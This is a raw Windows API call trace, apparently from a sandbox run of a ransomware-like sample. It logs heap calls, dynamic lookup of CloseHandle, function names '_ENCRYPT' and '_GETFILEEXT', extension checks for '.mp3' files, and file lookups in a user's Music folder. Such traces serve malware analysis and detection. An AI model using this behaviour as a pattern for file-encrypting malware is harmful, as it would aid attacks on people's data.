[0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.715] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0186.715] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.716] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.717] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0186.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0186.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.717] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0186.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.718] CloseHandle (hObject=0x120) returned 1 [0186.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0186.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0186.718] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.719] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0186.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.719] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.719] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0186.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.719] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0186.719] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0186.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.719] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x90f56120, ftLastWriteTime.dwHighDateTime=0x1d5d9a1, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 0x90add8 [0186.721] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.721] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.721] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x90f56120, ftLastWriteTime.dwHighDateTime=0x1d5d9a1, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 0x90add8 [0186.721] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0186.721] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 